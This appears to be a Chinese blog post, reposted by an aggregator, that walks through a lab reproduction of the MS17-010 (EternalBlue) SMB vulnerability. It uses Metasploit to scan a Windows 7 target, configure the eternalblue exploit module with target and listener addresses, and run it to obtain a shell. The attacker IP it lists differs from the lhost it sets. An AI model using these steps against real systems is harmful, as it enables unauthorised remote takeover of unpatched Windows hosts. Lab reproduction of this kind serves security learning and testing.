MS17-010漏洞复现

Posted lanyincao

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MS17-010漏洞复现相关的知识,希望对你有一定的参考价值。

 攻击机:192.168.148.132  kali linux2018.2  x64

靶机:192.168.1.129    win7   x64

首先msfconsole的smb模块扫描,看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.1.129 (目标主机)

技术图片

 Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona

 

表示这个主机存在这个漏洞

 

1 search  ms17_010 搜索这个漏洞

技术图片

2   use exploit/windows/smb/ms17_010_eternalblue           

                  利用这个漏洞

3 show options

技术图片

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129  目标主机

rhost => 192.168.1.129

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机

lhost => 192.168.1.132

msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 监听端口 (这个可以随意,但要大于2000,个人认为)

技术图片

run  开始攻击 这个表示拿shell成功了

技术图片

 

 

以上是关于MS17-010漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

永恒之蓝MS17-010漏洞复现

永恒之蓝漏洞复现(ms17-010)

MS17-010(永恒之蓝)漏洞复现和分析

永恒之蓝 MS17-010漏洞复现

永恒之蓝(ms17-010)漏洞简介及复现

ms17-010永恒之蓝病毒复现